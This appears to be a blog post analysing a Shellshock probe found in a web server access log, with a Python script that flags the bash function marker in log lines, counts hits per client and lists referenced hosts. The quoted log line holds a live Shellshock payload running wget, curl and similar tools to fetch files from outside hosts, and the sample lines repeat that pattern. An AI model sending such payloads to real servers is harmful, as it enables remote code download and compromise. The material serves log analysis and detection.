186.56.42.11 - - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http//luxsocks.ru ; wget https://luxsocks.ru --no-check-certificate ; curl http//luxsocks.ru// ; curl -k https://luxsocks.ru ; lwp-download http://luxsocks.ru ; GET http://luxsocks.ru ; lynx http://luxsocks.ru ; wget http://174.122.42.230/luxx ; curl http://174.122.42.230/luxx ; fetch http://174.122.42.230/luxx ; lwp-download http://174.122.42.230/luxx ; GET http://174.122.42.230/luxx ; lynx http://174.122.42.230/luxx\");'"

Judging by the commands above (wget https://luxsocks.ru --no-check-certificate), the idea behind this attack seems to have been to download and replace the index.html page. Just for the record: if an index.html page already exists in the download directory, wget will simply save the new file as index.html.1. If you only have an index.php, the attack might work, but it still seems odd.
The system was again hit 30 times within a short time span. So even if it had worked, it would have resulted in 30 index.html files.
When testing the link against VirusTotal, there was no result.
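
To find requests like the one above in an access log and count repeats per client, the following is an added example (not part of the original post). It assumes Apache's combined log format; the sample lines and the names `scan`, `MARKER_RE` and `HOST_RE` are constructed for illustration.

```python
import re
from collections import Counter

# Apache "combined" format; quoted fields may hold backslash-escaped quotes.
Q = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] ' + Q + r' \d{3} \S+ ' + Q + ' ' + Q + r'\s*$')
# Shellshock marker: a bash function definition inside a request field.
MARKER_RE = re.compile(r'\(\)\s*\{')
# Hosts named in the payload, including malformed "http//host" spellings.
HOST_RE = re.compile(r'https?:?//?([A-Za-z0-9.-]+)')

def scan(lines):
    """Return (marker hits per client IP, hosts referenced in the payloads)."""
    hits, hosts = Counter(), set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, request, referer, agent = m.groups()
        flagged = [f for f in (request, referer, agent) if MARKER_RE.search(f)]
        if flagged:
            hits[ip] += 1  # count each request once
            for field in flagged:
                hosts.update(HOST_RE.findall(field))
    return hits, hosts

# Constructed sample lines (documentation addresses, not the page's data).
SAMPLE = [
    r'''203.0.113.7 - - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'system(\"wget http//dl.example.invalid ; curl http://192.0.2.55/x\");'"''',
    r'''198.51.100.4 - - [25/Apr/2015:09:12:01 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"''',
    r'''203.0.113.7 - - [25/Apr/2015:09:12:05 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 470 "() { :;}; echo probe" "-"''',
    'not a log line',
]

if __name__ == "__main__":
    hits, hosts = scan(SAMPLE)
    for ip, n in hits.most_common():
        print(f"{ip}: {n} request(s) carrying the marker")
    print("hosts referenced:", ", ".join(sorted(hosts)))
```

The per-IP counter makes bursts like the 30 hits mentioned above visible at a glance, and the extracted hosts can be checked against outbound proxy or DNS logs to confirm that nothing on the server actually fetched them.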